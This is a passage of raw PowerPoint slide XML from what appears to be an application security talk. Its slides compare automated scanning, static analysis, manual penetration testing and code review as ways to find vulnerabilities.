                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Find Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Using the Source Code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(Inside-Out)  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="471488" y="5002213"/>
            <a:ext cx="2530475" cy="876300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 22921"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated Application Vulnerability Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6132513" y="5026025"/>
            <a:ext cx="2684462" cy="812800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29440"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated Static </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="485775" y="2449513"/>
            <a:ext cx="2527300" cy="792162"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 22921"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>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eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manual Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6115050" y="2438400"/>
            <a:ext cx="2701925" cy="842963"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 22921"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manual Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="AutoShape 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2767013" y="2967038"/>
            <a:ext cx="939800" cy="817562"/>
            <a:chOff x="1743" y="1605"/>
            <a:chExt cx="592" cy="515"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15389" name="AutoShape 14"/>
            <p:cNvPicPr>
              <a:picLocks noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print">
              <a:grayscl/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1743" y="1605"/>
              <a:ext cx="592" cy="515"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15390" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="2368694">
              <a:off x="1842" y="1821"/>
              <a:ext cx="452" cy="118"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="AutoShape 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2713038" y="4583113"/>
            <a:ext cx="938212" cy="815975"/>
            <a:chOff x="1709" y="2623"/>
            <a:chExt cx="591" cy="514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15387" name="AutoShape 15"/>
            <p:cNvPicPr>
              <a:picLocks noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print">
              <a:grayscl/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1709" y="2623"/>
              <a:ext cx="591" cy="514"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15388" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="8431305">
              <a:off x="1807" y="2778"/>
              <a:ext cx="452" cy="118"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rot="10800000" wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="AutoShape 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5389563" y="2973388"/>
            <a:ext cx="938212" cy="822325"/>
            <a:chOff x="3395" y="1609"/>
            <a:chExt cx="591" cy="518"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15385" name="AutoShape 16"/>
            <p:cNvPicPr>
              <a:picLocks noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print">
              <a:grayscl/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3395" y="1609"/>
              <a:ext cx="591" cy="518"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15386" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-2368696">
              <a:off x="3441" y="1826"/>
              <a:ext cx="452" cy="118"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="AutoShape 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5394325" y="4589463"/>
            <a:ext cx="946150" cy="815975"/>
            <a:chOff x="3398" y="2627"/>
            <a:chExt cx="596" cy="514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15383" name="AutoShape 17"/>
            <p:cNvPicPr>
              <a:picLocks noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print">
              <a:grayscl/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3398" y="2627"/>
              <a:ext cx="596" cy="514"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15384" name="Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-8431306">
              <a:off x="3446" y="2784"/>
              <a:ext cx="452" cy="118"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rot="10800000" wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Circular Arrow 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937000" y="3086100"/>
            <a:ext cx="978408" cy="97840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28" name="Circular Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10632199">
            <a:off x="3949700" y="3149600"/>
            <a:ext cx="978408" cy="97840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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="10"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="10" presetClass="entr" presetSubtype="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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="19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Runtime Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="1033462"/>
            <a:ext cx="8509000" cy="5557837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Automated (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1600" dirty="0" smtClean="0"/>
              <a:t>“Wide but not Deep”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Good:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Detecting technical vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>XSS, SSI, SQLI, Buffer Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Produce good coverage in a limited time (if lucky!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Cost effectiveness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Bad:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Does not detect business logic issues very well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>False sense of security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>False Positives &amp; (worse) False Negatives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Can Fail with complex flows or rich client apps (Web 2.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Non Standard environments, Can be fooled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Business impact identification. </a:t>
            </a:r>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="down.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7129462" y="3954462"/>
            <a:ext cx="1285875" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="up.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7154862" y="982662"/>
            <a:ext cx="1285875" cy="128587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Runtime Testing</a:t>
            </a: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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="355600" y="995362"/>
            <a:ext cx="7924800" cy="55578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Webdings" pitchFamily="18" charset="2"/>
              <a:buChar char="&lt;"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Manual (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>“Deep but less wide”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buChar char="4"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Good:</a:t>
            </a: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IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Detecting technical vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" marR="0" lvl="3" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="–"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
